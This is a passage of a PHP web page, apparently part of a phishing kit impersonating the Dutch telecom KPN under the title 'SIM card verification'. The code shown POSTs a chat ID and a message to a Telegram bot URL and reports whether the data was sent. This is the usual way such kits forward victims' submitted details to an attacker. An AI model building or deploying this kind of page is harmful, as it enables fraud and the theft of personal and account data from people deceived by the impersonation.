$chatID,
'text' => $message
];
$options = [
'http' => [
'header' => "Content-type: application/x-www-form-urlencoded\r\n",
'method' => 'POST',
'content' => http_build_query($data),
],
];
$context = stream_context_create($options);
$result = file_get_contents($telegramURL, false, $context);
if ($result === FALSE) {
echo "Failed to send data to Telegram.
";
} else {
echo "Data sent to Telegram successfully!
";
}
}
?>
KPN SIMKAART VERIFICATIE